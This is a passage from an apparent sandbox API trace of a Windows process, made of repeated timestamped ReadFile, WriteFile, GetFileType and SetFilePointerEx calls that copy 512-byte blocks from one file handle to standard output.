lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.955] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.955] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.956] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.957] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.957] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.958] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.959] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.960] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.961] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, 